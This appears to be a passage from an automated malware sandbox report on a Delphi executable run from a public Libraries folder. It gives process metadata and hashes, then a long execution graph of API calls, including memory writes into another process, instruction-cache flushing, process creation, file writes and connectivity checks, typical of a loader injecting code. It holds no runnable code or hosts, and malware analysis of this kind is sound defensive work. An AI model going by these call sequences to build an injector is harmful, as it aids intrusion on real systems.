                                                                          Commandline:"C:\Users\Public\Libraries\Bzaszylr.PIF"
                                                                          Imagebase:0x400000
                                                                          File size:1'339'392 bytes
                                                                          MD5 hash:B4E2055B4877DCFCBF9A366106B15591
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:Borland Delphi
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:21
                                                                          Start time:02:24:31
                                                                          Start date:26/11/2024
                                                                          Path:C:\Windows\SysWOW64\colorcpl.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\System32\colorcpl.exe
                                                                          Imagebase:0x1b0000
                                                                          File size:86'528 bytes
                                                                          MD5 hash:DB71E132EBF1FEB6E93E8A2A0F0C903D
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Disassembly

                                                                          Reset < >

                                                                            Execution Graph

                                                                            Execution Coverage:18.6%
                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                            Signature Coverage:3.5%
                                                                            Total number of Nodes:2000
                                                                            Total number of Limit Nodes:21
                                                                            execution_graph 32393 28a8128 33028 2884860 32393->33028 33029 2884871 33028->33029 33030 28848ae 33029->33030 33031 2884897 33029->33031 33046 28845a0 33030->33046 33037 2884bcc 33031->33037 33034 28848df 33035 28848a4 33035->33034 33051 2884530 33035->33051 33038 2884bd9 33037->33038 33045 2884c09 33037->33045 33040 2884c02 33038->33040 33043 2884be5 33038->33043 33041 28845a0 11 API calls 33040->33041 33041->33045 33042 2884bf3 33042->33035 33057 2882c44 11 API calls 33043->33057 33058 28844dc 33045->33058 33047 28845c8 33046->33047 33048 28845a4 33046->33048 33047->33035 33063 2882c10 11 API calls 33048->33063 33050 28845b1 33050->33035 33052 2884534 33051->33052 33055 2884544 33051->33055 33054 28845a0 11 API calls 33052->33054 33052->33055 33053 2884572 33053->33034 33054->33055 33055->33053 33064 2882c2c 11 API calls 33055->33064 33057->33042 33059 28844fd 33058->33059 33060 28844e2 33058->33060 33059->33042 33060->33059 33062 2882c2c 11 API calls 33060->33062 33062->33059 33063->33050 33064->33053 33065 2884edc 33066 2884ee9 33065->33066 33070 2884ef0 33065->33070 33071 2884c38 33066->33071 33077 2884c50 33070->33077 33072 2884c4c 33071->33072 33073 2884c3c SysAllocStringLen 33071->33073 33072->33070 33073->33072 33074 2884c30 33073->33074 33075 2884f26 SysAllocStringLen 33074->33075 33076 2884f3c 33074->33076 33075->33074 33075->33076 33076->33070 33078 2884c5c 33077->33078 33079 2884c56 SysFreeString 33077->33079 33079->33078 33080 2881c6c 33081 2881c7c 33080->33081 33082 2881d04 33080->33082 33085 2881c89 33081->33085 33086 2881cc0 33081->33086 33083 2881f58 33082->33083 33084 2881d0d 33082->33084 33087 2881fec 33083->33087 33092 2881f68 33083->33092 33093 2881fac 33083->33093 33088 2881d25 33084->33088 33103 2881e24 33084->33103 33090 2881c94 33085->33090 33128 2881724 33085->33128 33089 2881724 10 API calls 33086->33089 33095 2881d2c 33088->33095 33098 2881d48 33088->33098 33104 2881dfc 33088->33104 33110 2881cd7 33089->33110 33096 2881724 10 API calls 33092->33096 33100 2881fb2 33093->33100 33101 2881724 10 API calls 33093->33101 33094 2881e7c 33097 2881724 10 API calls 33094->33097 33113 2881e95 33094->33113 33117 2881f82 33096->33117 33115 2881f2c 33097->33115 33108 2881d79 Sleep 33098->33108 33119 2881d9c 33098->33119 33099 2881cfd 33118 2881fc1 33101->33118 33102 2881cb9 33103->33094 33107 2881e55 Sleep 33103->33107 33103->33113 33105 2881724 10 API calls 33104->33105 33121 2881e05 33105->33121 33106 2881fa7 33107->33094 33111 2881e6f Sleep 33107->33111 33112 2881d91 Sleep 33108->33112 33108->33119 33109 2881ca1 33109->33102 33152 2881a8c 33109->33152 33110->33099 33116 2881a8c 8 API calls 33110->33116 33111->33103 33112->33098 33115->33113 33120 2881a8c 8 API calls 33115->33120 33116->33099 33117->33106 33122 2881a8c 8 API calls 33117->33122 33118->33106 33123 2881a8c 8 API calls 33118->33123 33124 2881f50 33120->33124 33125 2881a8c 8 API calls 33121->33125 33127 2881e1d 33121->33127 33122->33106 33126 2881fe4 33123->33126 33125->33127 33129 2881968 33128->33129 33130 288173c 33128->33130 33131 2881a80 33129->33131 33132 2881938 33129->33132 33139 28817cb Sleep 33130->33139 33140 288174e 33130->33140 33133 2881a89 33131->33133 33134 2881684 VirtualAlloc 33131->33134 33136 2881947 Sleep 33132->33136 33145 2881986 33132->33145 33133->33109 33137 28816bf 33134->33137 33138 28816af 33134->33138 33135 288175d 33135->33109 33142 288195d Sleep 33136->33142 33136->33145 33137->33109 33169 2881644 33138->33169 33139->33140 33144 28817e4 Sleep 33139->33144 33140->33135 33141 288182c 33140->33141 33146 288180a Sleep 33140->33146 33151 2881838 33141->33151 33175 28815cc 33141->33175 33142->33132 33144->33130 33147 28815cc VirtualAlloc 33145->33147 33150 28819a4 33145->33150 33146->33141 33148 2881820 Sleep 33146->33148 33147->33150 33148->33140 33150->33109 33151->33109 33153 2881b6c 33152->33153 33154 2881aa1 33152->33154 33155 28816e8 33153->33155 33156 2881aa7 33153->33156 33154->33156 33157 2881b13 Sleep 33154->33157 33159 2881c66 33155->33159 33162 2881644 2 API calls 33155->33162 33158 2881ab0 33156->33158 33161 2881b4b Sleep 33156->33161 33166 2881b81 33156->33166 33157->33156 33160 2881b2d Sleep 33157->33160 33158->33102 33159->33102 33160->33154 33163 2881b61 Sleep 33161->33163 33161->33166 33164 28816f5 VirtualFree 33162->33164 33163->33156 33165 288170d 33164->33165 33165->33102 33167 2881c00 VirtualFree 33166->33167 33168 2881ba4 33166->33168 33167->33102 33168->33102 33170 2881681 33169->33170 33171 288164d 33169->33171 33170->33137 33171->33170 33172 288164f Sleep 33171->33172 33173 2881664 33172->33173 33173->33170 33174 2881668 Sleep 33173->33174 33174->33171 33179 2881560 33175->33179 33177 28815d4 VirtualAlloc 33178 28815eb 33177->33178 33178->33151 33180 2881500 33179->33180 33180->33177 33181 28ad2fc 33191 288656c 33181->33191 33185 28ad32a 33196 28ac35c timeSetEvent 33185->33196 33187 28ad334 33188 28ad342 GetMessageA 33187->33188 33189 28ad352 33188->33189 33190 28ad336 TranslateMessage DispatchMessageA 33188->33190 33190->33188 33192 2886577 33191->33192 33197 2884198 33192->33197 33195 28842ac SysFreeString SysReAllocStringLen SysAllocStringLen 33195->33185 33196->33187 33198 28841de 33197->33198 33199 28843e8 33198->33199 33200 2884257 33198->33200 33203 2884419 33199->33203 33206 288442a 33199->33206 33211 2884130 33200->33211 33216 288435c GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 33203->33216 33205 2884423 33205->33206 33207 288446f FreeLibrary 33206->33207 33208 2884493 33206->33208 33207->33206 33209 288449c 33208->33209 33210 28844a2 ExitProcess 33208->33210 33209->33210 33212 2884140 33211->33212 33213 2884173 33211->33213 33212->33213 33215 28815cc VirtualAlloc 33212->33215 33217 2885868 33212->33217 33213->33195 33215->33212 33216->33205 33218 2885878 GetModuleFileNameA 33217->33218 33219 2885894 33217->33219 33221 2885acc GetModuleFileNameA RegOpenKeyExA 33218->33221 33219->33212 33222 2885b4f 33221->33222 33223 2885b0f RegOpenKeyExA 33221->33223 33239 2885908 12 API calls 33222->33239 33223->33222 33224 2885b2d RegOpenKeyExA 33223->33224 33224->33222 33226 2885bd8 lstrcpynA GetThreadLocale GetLocaleInfoA 33224->33226 33230 2885c0f 33226->33230 33231 2885cf2 33226->33231 33227 2885b74 RegQueryValueExA 33228 2885b94 RegQueryValueExA 33227->33228 33229 2885bb2 RegCloseKey 33227->33229 33228->33229 33229->33219 33230->33231 33233 2885c1f lstrlenA 33230->33233 33231->33219 33234 2885c37 33233->33234 33234->33231 33235 2885c5c lstrcpynA LoadLibraryExA 33234->33235 33236 2885c84 33234->33236 33235->33236 33236->33231 33237 2885c8e lstrcpynA LoadLibraryExA 33236->33237 33237->33231 33238 2885cc0 lstrcpynA LoadLibraryExA 33237->33238 33238->33231 33239->33227 33240 28a3e12 33241 2884860 11 API calls 33240->33241 33242 28a3e33 33241->33242 33243 28a3e4b 33242->33243 34797 28847ec 33243->34797 33245 28a3e6a 33246 28a3e82 33245->33246 34812 28989d0 33246->34812 33251 2884860 11 API calls 33252 28a3ee0 33251->33252 33253 28a3eeb 33252->33253 33254 28a3ef7 33253->33254 33255 2884860 11 API calls 33254->33255 33256 28a3f18 33255->33256 33257 28a3f23 33256->33257 33258 28a3f30 33257->33258 33259 28847ec 11 API calls 33258->33259 33260 28a3f4f 33259->33260 33261 28a3f67 33260->33261 33262 28989d0 20 API calls 33261->33262 33263 28a3f73 33262->33263 33264 2884860 11 API calls 33263->33264 33265 28a3f94 33264->33265 33266 28a3f9f 33265->33266 33267 28a3fac 33266->33267 33268 28847ec 11 API calls 33267->33268 33269 28a3fcb 33268->33269 33270 28a3fe3 33269->33270 33271 28989d0 20 API calls 33270->33271 33272 28a3fef 33271->33272 33273 2884860 11 API calls 33272->33273 33274 28a4010 33273->33274 33275 28a401b 33274->33275 33276 28a4028 33275->33276 33277 28847ec 11 API calls 33276->33277 33278 28a4047 33277->33278 33279 28a4052 33278->33279 33280 28a405f 33279->33280 33281 28989d0 20 API calls 33280->33281 33282 28a406b 33281->33282 34832 289e358 33282->34832 33285 28a4091 33286 28a40a2 33285->33286 34837 289dc8c 33286->34837 33289 2884860 11 API calls 33290 28a40f1 33289->33290 33291 28a40fc 33290->33291 33292 28847ec 11 API calls 33291->33292 33293 28a4128 33292->33293 33294 28a4133 33293->33294 33295 28989d0 20 API calls 33294->33295 33296 28a414c 33295->33296 33297 2884860 11 API calls 33296->33297 33298 28a416d 33297->33298 33299 28847ec 11 API calls 33298->33299 33300 28a41a4 33299->33300 33301 28a41af 33300->33301 33302 28989d0 20 API calls 33301->33302 33303 28a41c8 33302->33303 34852 28988b8 LoadLibraryW 33303->34852 33305 28a41cd 33306 28a41d7 33305->33306 34857 289e678 33306->34857 33309 2884860 11 API calls 33310 28a4217 33309->33310 34996 28846d4 33310->34996 34798 28847f0 34797->34798 34799 2884851 34797->34799 34800 28847f8 34798->34800 34801 2884530 34798->34801 34800->34799 34802 2884807 34800->34802 34805 2884530 11 API calls 34800->34805 34804 28845a0 11 API calls 34801->34804 34807 2884544 34801->34807 34806 28845a0 11 API calls 34802->34806 34803 2884572 34803->33245 34804->34807 34805->34802 34809 2884821 34806->34809 34807->34803 34998 2882c2c 11 API calls 34807->34998 34810 2884530 11 API calls 34809->34810 34811 288484d 34810->34811 34811->33245 34813 28989e4 34812->34813 34999 28981cc 34813->34999 34815 2898a1d 35010 2898274 34815->35010 34817 2898a36 35021 2897d78 34817->35021 34819 2898a95 35035 2898338 34819->35035 34822 2898abc 35047 2884500 34822->35047 34825 289f094 34829 289f0b9 34825->34829 34826 289f0e5 34828 28844dc 11 API calls 34826->34828 34830 289f0fa 34828->34830 34829->34826 35059 28846c4 11 API calls 34829->35059 35060 2884530 11 API calls 34829->35060 34830->33251 34833 2884bcc 11 API calls 34832->34833 34835 289e370 34833->34835 34834 289e391 34834->33285 34835->34834 35061 28849f8 34835->35061 34838 289dca2 34837->34838 35068 2884f20 34838->35068 34840 289dcaa 34841 289dcca RtlDosPathNameToNtPathName_U 34840->34841 35072 289dbdc 34841->35072 34843 289dce6 NtCreateFile 34844 289dd11 34843->34844 34845 28849f8 11 API calls 34844->34845 34846 289dd23 NtWriteFile NtClose 34845->34846 34847 289dd4d 34846->34847 35073 2884c60 34847->35073 34850 28844dc 11 API calls 34851 289dd5d Sleep 34850->34851 34851->33289 34853 2898274 15 API calls 34852->34853 34854 28988f1 34853->34854 34855 2897d78 18 API calls 34854->34855 34856 289891f FreeLibrary 34855->34856 34856->33305 34858 289e681 34857->34858 34858->34858 34859 2884860 11 API calls 34858->34859 34860 289e6ca 34859->34860 34861 28847ec 11 API calls 34860->34861 34862 289e6ef 34861->34862 34863 28989d0 20 API calls 34862->34863 34864 289e70a 34863->34864 34865 2884860 11 API calls 34864->34865 34866 289e723 34865->34866 34867 28847ec 11 API calls 34866->34867 34868 289e748 34867->34868 34869 28989d0 20 API calls 34868->34869 34870 289e763 34869->34870 34871 2884860 11 API calls 34870->34871 34872 289e77c 34871->34872 34873 28847ec 11 API calls 34872->34873 34874 289e7a1 34873->34874 34875 28989d0 20 API calls 34874->34875 34876 289e7bc 34875->34876 34877 2884860 11 API calls 34876->34877 34878 289e7ee 34877->34878 34879 28989d0 20 API calls 34878->34879 34880 289e838 34879->34880 34881 2884860 11 API calls 34880->34881 34882 289e86f 34881->34882 34883 28847ec 11 API calls 34882->34883 34884 289e894 34883->34884 34885 28989d0 20 API calls 34884->34885 34886 289e8af 34885->34886 34887 2884860 11 API calls 34886->34887 34888 289e8c8 34887->34888 34889 28847ec 11 API calls 34888->34889 34890 289e8ed 34889->34890 34891 28989d0 20 API calls 34890->34891 34892 289e908 34891->34892 34893 2884860 11 API calls 34892->34893 34894 289e921 34893->34894 34895 28847ec 11 API calls 34894->34895 34896 289e946 34895->34896 34897 28989d0 20 API calls 34896->34897 34898 289e961 34897->34898 35076 2887f2c 34898->35076 34900 289e985 35080 2898788 34900->35080 34903 2884860 11 API calls 34904 289ea0a 34903->34904 34905 28847ec 11 API calls 34904->34905 34906 289ea3b 34905->34906 34907 28989d0 20 API calls 34906->34907 34908 289ea5f 34907->34908 34909 2884860 11 API calls 34908->34909 34910 289ea7b 34909->34910 34911 28847ec 11 API calls 34910->34911 34912 289eaac 34911->34912 34913 28989d0 20 API calls 34912->34913 34914 289ead0 34913->34914 34915 2884860 11 API calls 34914->34915 34916 289eaec 34915->34916 34917 28847ec 11 API calls 34916->34917 34918 289eb1d 34917->34918 34919 28989d0 20 API calls 34918->34919 34920 289eb41 34919->34920 34921 2884860 11 API calls 34920->34921 34922 289eb5d 34921->34922 34923 28847ec 11 API calls 34922->34923 34924 289eb7b 34923->34924 35092 289894c LoadLibraryW 34924->35092 34927 2884860 11 API calls 34928 289ebac 34927->34928 34929 28847ec 11 API calls 34928->34929 34930 289ebca 34929->34930 34931 289894c 21 API calls 34930->34931 34932 289ebdf 34931->34932 34933 2884860 11 API calls 34932->34933 34934 289ebfb 34933->34934 34935 28847ec 11 API calls 34934->34935 34936 289ec19 34935->34936 34937 289894c 21 API calls 34936->34937 34938 289ec2e 34937->34938 34939 2884860 11 API calls 34938->34939 34940 289ec4a 34939->34940 34941 28847ec 11 API calls 34940->34941 34942 289ec68 34941->34942 34943 289894c 21 API calls 34942->34943 34944 289ec7d 34943->34944 34945 289eee2 34944->34945 34946 289ec87 34944->34946 34948 2884500 11 API calls 34945->34948 34947 2884860 11 API calls 34946->34947 34951 289eca3 34947->34951 34949 289eeff 34948->34949 34950 2884c60 SysFreeString 34949->34950 34952 289ef0a 34950->34952 34954 28847ec 11 API calls 34951->34954 34953 2884500 11 API calls 34952->34953 34955 289ef1a 34953->34955 34959 289ecd4 34954->34959 34956 2884c60 SysFreeString 34955->34956 34957 289ef22 34956->34957 34958 2884500 11 API calls 34957->34958 34960 289ef2f 34958->34960 34961 28989d0 20 API calls 34959->34961 34960->33309 34962 289ecf8 34961->34962 34963 2884860 11 API calls 34962->34963 34964 289ed14 34963->34964 34965 28847ec 11 API calls 34964->34965 34966 289ed45 34965->34966 34967 28989d0 20 API calls 34966->34967 34968 289ed69 WaitForSingleObject CloseHandle CloseHandle 34967->34968 34969 2884860 11 API calls 34968->34969 34970 289eda0 34969->34970 34971 28847ec 11 API calls 34970->34971 34972 289edbe 34971->34972 34973 289894c 21 API calls 34972->34973 34974 289edd3 34973->34974 34975 2884860 11 API calls 34974->34975 34976 289edef 34975->34976 34977 28847ec 11 API calls 34976->34977 34978 289ee0d 34977->34978 34979 289894c 21 API calls 34978->34979 34980 289ee22 34979->34980 34981 2884860 11 API calls 34980->34981 34982 289ee3e 34981->34982 34983 28847ec 11 API calls 34982->34983 34984 289ee5c 34983->34984 34985 289894c 21 API calls 34984->34985 34986 289ee71 34985->34986 34987 2884860 11 API calls 34986->34987 34988 289ee8d 34987->34988 34989 28847ec 11 API calls 34988->34989 34990 289eeab 34989->34990 34991 289894c 21 API calls 34990->34991 34992 289eec0 34991->34992 34993 289894c 21 API calls 34992->34993 34994 289eed1 34993->34994 34995 289894c 21 API calls 34994->34995 34995->34945 34997 28846da 34996->34997 34998->34803 35000 2884530 11 API calls 34999->35000 35001 28981ef 35000->35001 35051 289798c 35001->35051 35003 28981fc 35004 2898204 GetModuleHandleA 35003->35004 35005 2898274 15 API calls 35004->35005 35006 2898215 GetModuleHandleA 35005->35006 35007 2898233 35006->35007 35008 28844dc 11 API calls 35007->35008 35009 289823b 35008->35009 35009->34815 35011 2884530 11 API calls 35010->35011 35012 2898299 35011->35012 35013 289798c 12 API calls 35012->35013 35014 28982a6 35013->35014 35015 28847ec 11 API calls 35014->35015 35016 28982b3 35015->35016 35017 28982bb GetModuleHandleW GetProcAddress GetProcAddress 35016->35017 35018 28982ee 35017->35018 35019 2884500 11 API calls 35018->35019 35020 28982fb 35019->35020 35020->34817 35022 2884530 11 API calls 35021->35022 35023 2897d9d 35022->35023 35024 289798c 12 API calls 35023->35024 35025 2897daa 35024->35025 35026 28847ec 11 API calls 35025->35026 35027 2897dba 35026->35027 35028 28981cc 17 API calls 35027->35028 35029 2897dcd 35028->35029 35030 2898274 15 API calls 35029->35030 35031 2897dd3 NtWriteVirtualMemory 35030->35031 35032 2897dff 35031->35032 35033 2884500 11 API calls 35032->35033 35034 2897e0c 35033->35034 35034->34819 35036 2884530 11 API calls 35035->35036 35037 289835b 35036->35037 35038 2884860 11 API calls 35037->35038 35039 289837a 35038->35039 35040 28981cc 17 API calls 35039->35040 35041 289838d 35040->35041 35042 2898274 15 API calls 35041->35042 35043 2898393 FlushInstructionCache 35042->35043 35044 28983b9 35043->35044 35045 28844dc 11 API calls 35044->35045 35046 28983c1 FreeLibrary 35045->35046 35046->34822 35049 2884506 35047->35049 35048 288452c 35048->34825 35049->35048 35058 2882c2c 11 API calls 35049->35058 35052 289799d 35051->35052 35053 2884bcc 11 API calls 35052->35053 35056 28979ad 35053->35056 35054 2897a19 35054->35003 35056->35054 35057 288babc CharNextA 35056->35057 35057->35056 35058->35049 35059->34829 35060->34829 35062 28849ac 35061->35062 35063 28849e7 35062->35063 35064 28845a0 11 API calls 35062->35064 35063->34835 35065 28849c3 35064->35065 35065->35063 35067 2882c2c 11 API calls 35065->35067 35067->35063 35069 2884f3c 35068->35069 35070 2884f26 SysAllocStringLen 35068->35070 35069->34840 35070->35069 35071 2884c30 35070->35071 35071->35068 35072->34843 35074 2884c74 35073->35074 35075 2884c66 SysFreeString 35073->35075 35074->34850 35075->35074 35077 2887f3f 35076->35077 35099 2884a00 35077->35099 35081 2884530 11 API calls 35080->35081 35082 28987ab 35081->35082 35083 2884860 11 API calls 35082->35083 35084 28987ca 35083->35084 35085 28981cc 17 API calls 35084->35085 35086 28987dd 35085->35086 35087 2898274 15 API calls 35086->35087 35088 28987e3 CreateProcessAsUserW 35087->35088 35089 2898827 35088->35089 35090 28844dc 11 API calls 35089->35090 35091 289882f 35090->35091 35091->34903 35093 28989bb 35092->35093 35094 2898973 GetProcAddress 35092->35094 35093->34927 35095 289898d 35094->35095 35096 28989b0 FreeLibrary 35094->35096 35097 2897d78 18 API calls 35095->35097 35096->35093 35098 28989a5 35097->35098 35098->35096 35100 2884a32 35099->35100 35102 2884a05 35099->35102 35101 28844dc 11 API calls 35100->35101 35103 2884a28 35101->35103 35102->35100 35104 2884a19 35102->35104 35103->34900 35106 28845cc 35104->35106 35107 28845a0 11 API calls 35106->35107 35108 28845dc 35107->35108 35109 28844dc 11 API calls 35108->35109 35110 28845f4 35109->35110 35110->35103 35111 28ac350 35114 289f7c8 35111->35114 35115 289f7d0 35114->35115 35115->35115 35116 289f7d7 35115->35116 35117 28988b8 20 API calls 35116->35117 35118 289f7f1 35117->35118 37528 2882ee0 QueryPerformanceCounter 35118->37528 35120 289f7f6 35121 289f800 InetIsOffline 35120->35121 35122 289f81b 35121->35122 35123 289f80a 35121->35123 35124 2884530 11 API calls 35122->35124 35125 2884530 11 API calls 35123->35125 35126 289f819 35124->35126 35125->35126 35127 2884860 11 API calls 35126->35127 35128 289f848 35127->35128 35129 289f850 35128->35129 35130 289f85a 35129->35130 35131 28847ec 11 API calls 35130->35131 35132 289f873 35131->35132 35133 289f87b 35132->35133 35134 289f885 35133->35134 35135 28989d0 20 API calls 35134->35135 35136 289f88e 35135->35136 35137 2884860 11 API calls 35136->35137 35138 289f8ac 35137->35138 35139 289f8b4 35138->35139 35140 289f8be 35139->35140 35141 28847ec 11 API calls 35140->35141 35142 289f8d7 35141->35142 35143 289f8df 35142->35143 35144 289f8e9 35143->35144 35145 28989d0 20 API calls 35144->35145 35146 289f8f2 35145->35146 35147 2884860 11 API calls 35146->35147 35148 289f910 35147->35148 35149 289f918 35148->35149 35150 28846d4 35149->35150 35151 289f922 35150->35151 35152 28847ec 11 API calls 35151->35152 35153 289f93b 35152->35153 35154 289f94d 35153->35154 35155 28989d0 20 API calls 35154->35155 35156 289f956 35155->35156 35157 2884860 11 API calls 35156->35157 35158 289f974 35157->35158 35159 28846d4 35158->35159 35160 289f986 35159->35160 35161 28847ec 11 API calls 35160->35161 35162 289f99f 35161->35162 35163 289f9b1 35162->35163 35164 28989d0 20 API calls 35163->35164 35165 289f9ba 35164->35165 35166 2884860 11 API calls 35165->35166 35167 289f9d8 35166->35167 35168 289f9ea 35167->35168 35169 28847ec 11 API calls 35168->35169 35170 289fa03 35169->35170 35171 28989d0 20 API calls 35170->35171 35172 289fa1e 35171->35172 35173 2884860 11 API calls 35172->35173 35174 289fa3c 35173->35174 35175 289fa4e 35174->35175 35176 28847ec 11 API calls 35175->35176 35177 289fa67 35176->35177 35178 289fa79 35177->35178 35179 28989d0 20 API calls 35178->35179 35180 289fa82 35179->35180 35181 2884860 11 API calls 35180->35181 35182 289faa0 35181->35182 35183 289faa8 35182->35183 35184 289fab2 35183->35184 35185 28847ec 11 API calls 35184->35185 35186 289facb 35185->35186 35187 289fad3 35186->35187 35188 289fadd 35187->35188 35189 28989d0 20 API calls 35188->35189 35190 289fae6 35189->35190 37531 289f6e8 GetModuleHandleW 35190->37531 35192 289faeb 35193 28ab2ff 35192->35193 35194 289faf3 35192->35194 37535 289f744 GetModuleHandleW 35194->37535 35197 289fb00 35198 289fb1e 35197->35198 35199 28989d0 20 API calls 35198->35199 35200 289fb27 35199->35200 35201 289fb45 35200->35201 35202 28989d0 20 API calls 35201->35202 35203 289fb4e 35202->35203 35204 28846d4 35203->35204 35205 289fb5e 35204->35205 35206 289fb75 35205->35206 35207 28989d0 20 API calls 35206->35207 35208 289fb81 35207->35208 35209 2884860 11 API calls 35208->35209 35210 289fba2 35209->35210 35211 289fbad 35210->35211 35212 28847ec 11 API calls 35211->35212 35213 289fbd9 35212->35213 37539 28849a0 35213->37539 35216 289fbf1 35217 28989d0 20 API calls 35216->35217 35218 289fbfd 35217->35218 35219 28846d4 35218->35219 35220 289fc0d 35219->35220 35221 289fc24 35220->35221 35222 28989d0 20 API calls 35221->35222 35223 289fc30 35222->35223 35224 289fc40 35223->35224 35225 28846d4 35224->35225 35226 289fc57 35225->35226 35227 28989d0 20 API calls 35226->35227 35228 289fc63 35227->35228 35229 289fc73 35228->35229 35230 28989d0 20 API calls 35229->35230 35231 289fc96 35230->35231 35232 2884860 11 API calls 35231->35232 35233 289fcb7 35232->35233 35234 289fccf 35233->35234 35235 28847ec 11 API calls 35234->35235 35236 289fcee 35235->35236 35237 289fd06 35236->35237 35238 28989d0 20 API calls 35237->35238 35239 289fd12 35238->35239 35240 2884860 11 API calls 35239->35240 35241 289fd33 35240->35241 35242 289fd3e 35241->35242 35243 289fd4b 35242->35243 35244 28847ec 11 API calls 35243->35244 35245 289fd6a 35244->35245 35246 289fd75 35245->35246 35247 28989d0 20 API calls 35246->35247 35248 289fd8e 35247->35248 35249 289fd9e 35248->35249 35250 28989d0 20 API calls 35249->35250 35251 289fdc1 35250->35251 35252 28846d4 35251->35252 35253 289fdd1 35252->35253 35254 28989d0 20 API calls 35253->35254 35255 289fdf4 35254->35255 35256 289fe04 35255->35256 35257 289fe1b 35256->35257 35258 28989d0 20 API calls 35257->35258 35259 289fe27 35258->35259 35260 2884860 11 API calls 35259->35260 35261 289fe48 35260->35261 35262 28849a0 35261->35262 35263 289fe53 35262->35263 35264 289fe60 35263->35264 35265 28847ec 11 API calls 35264->35265 35266 289fe7f 35265->35266 35267 289fe8a 35266->35267 35268 28989d0 20 API calls 35267->35268 35269 289fea3 35268->35269 35270 289feb3 35269->35270 35271 289feca 35270->35271 35272 28989d0 20 API calls 35271->35272 35273 289fed6 35272->35273 35274 289fee6 35273->35274 35275 289fefd 35274->35275 35276 28989d0 20 API calls 35275->35276 35277 289ff09 35276->35277 35278 289ff19 35277->35278 35279 289ff30 35278->35279 35280 28989d0 20 API calls 35279->35280 35281 289ff3c 35280->35281 35282 2884860 11 API calls 35281->35282 35283 289ff5d 35282->35283 35284 289ff68 35283->35284 35285 289ff75 35284->35285 35286 28847ec 11 API calls 35285->35286 35287 289ff94 35286->35287 35288 289ffac 35287->35288 35289 28989d0 20 API calls 35288->35289 35290 289ffb8 35289->35290 35291 2884860 11 API calls 35290->35291 35292 289ffd9 35291->35292 35293 289ffe4 35292->35293 35294 289fff1 35293->35294 35295 28847ec 11 API calls 35294->35295 35296 28a0010 35295->35296 35297 28a0028 35296->35297 35298 28989d0 20 API calls 35297->35298 35299 28a0034 35298->35299 35300 28a005b 35299->35300 35301 28989d0 20 API calls 35300->35301 35302 28a0067 35301->35302 35303 28989d0 20 API calls 35302->35303 35304 28a009a 35303->35304 35305 28989d0 20 API calls 35304->35305 35306 28a00cd 35305->35306 35307 2884860 11 API calls 35306->35307 35308 28a00ee 35307->35308 35309 28847ec 11 API calls 35308->35309 35310 28a0125 35309->35310 35311 28989d0 20 API calls 35310->35311 35312 28a0149 35311->35312 35313 2884860 11 API calls 35312->35313 35314 28a016a 35313->35314 35315 28847ec 11 API calls 35314->35315 35316 28a01a1 35315->35316 35317 28989d0 20 API calls 35316->35317 35318 28a01c5 35317->35318 35319 2884860 11 API calls 35318->35319 35320 28a01e6 35319->35320 35321 28847ec 11 API calls 35320->35321 35322 28a021d 35321->35322 35323 28989d0 20 API calls 35322->35323 35324 28a0241 35323->35324 35325 2884860 11 API calls 35324->35325 35326 28a0262 35325->35326 35327 28a026d 35326->35327 35328 28847ec 11 API calls 35327->35328 35329 28a0299 35328->35329 35330 28a02a4 35329->35330 35331 28989d0 20 API calls 35330->35331 35332 28a02bd 35331->35332 35333 28a02cc 35332->35333 35334 28a02d8 35333->35334 37541 289e0f8 35334->37541 35337 2884530 11 API calls 35338 28a0306 35337->35338 35339 2884860 11 API calls 35338->35339 35340 28a0327 35339->35340 35341 28a0332 35340->35341 35342 28a033f 35341->35342 35343 28847ec 11 API calls 35342->35343 35344 28a035e 35343->35344 35345 28989d0 20 API calls 35344->35345 35346 28a0382 35345->35346 35347 2884860 11 API calls 35346->35347 35348 28a03a3 35347->35348 35349 28a03ae 35348->35349 35350 28a03bb 35349->35350 35351 28847ec 11 API calls 35350->35351 35352 28a03da 35351->35352 35353 28989d0 20 API calls 35352->35353 35354 28a03fe 35353->35354 35355 28847ec 11 API calls 35354->35355 35356 28a0414 35355->35356 37551 2887e5c 35356->37551 35359 28a0427 35362 2884860 11 API calls 35359->35362 35360 28a0534 35361 2884860 11 API calls 35360->35361 35363 28a0555 35361->35363 35364 28a0448 35362->35364 35365 28a0560 35363->35365 35366 28a0453 35364->35366 35367 28847ec 11 API calls 35365->35367 35368 28847ec 11 API calls 35366->35368 35369 28a058c 35367->35369 35370 28a047f 35368->35370 35371 28a0597 35369->35371 35372 28a048a 35370->35372 35373 28989d0 20 API calls 35371->35373 35374 28989d0 20 API calls 35372->35374 35375 28a05b0 35373->35375 35376 28a04a3 35374->35376 35377 2884860 11 API calls 35375->35377 35378 2884860 11 API calls 35376->35378 35379 28a05d1 35377->35379 35380 28a04c4 35378->35380 35382 28a05e9 35379->35382 35381 28a04cf 35380->35381 35383 28a04dc 35381->35383 35384 28847ec 11 API calls 35382->35384 35385 28847ec 11 API calls 35383->35385 35387 28a0608 35384->35387 35386 28a04fb 35385->35386 35388 28a0506 35386->35388 35389 28a0620 35387->35389 35390 28a0513 35388->35390 35391 28989d0 20 API calls 35389->35391 35392 28989d0 20 API calls 35390->35392 35393 28a062c 35391->35393 35394 28a051f 35392->35394 35395 289e0f8 11 API calls 35393->35395 35396 2884530 11 API calls 35394->35396 35397 28a063c 35395->35397 35398 28a052f 35396->35398 35399 2884530 11 API calls 35397->35399 35400 2884860 11 API calls 35398->35400 35399->35398 35401 28a066d 35400->35401 35402 28a0678 35401->35402 35403 28847ec 11 API calls 35402->35403 35404 28a06a4 35403->35404 35405 28a06af 35404->35405 35406 28989d0 20 API calls 35405->35406 35407 28a06c8 35406->35407 35408 2884860 11 API calls 35407->35408 35409 28a06e9 35408->35409 35410 28a06f4 35409->35410 35411 28847ec 11 API calls 35410->35411 35412 28a0720 35411->35412 35413 28a072b 35412->35413 35414 28989d0 20 API calls 35413->35414 35415 28a0744 35414->35415 37555 288c364 GetModuleFileNameA 35415->37555 35418 2884530 11 API calls 35419 28a0761 35418->35419 35420 2884a00 11 API calls 35419->35420 35421 28a0794 35420->35421 35422 2884860 11 API calls 35421->35422 35423 28a07b5 35422->35423 35424 28a07cd 35423->35424 35425 28847ec 11 API calls 35424->35425 35426 28a07ec 35425->35426 35427 28a0804 35426->35427 35428 28989d0 20 API calls 35427->35428 35429 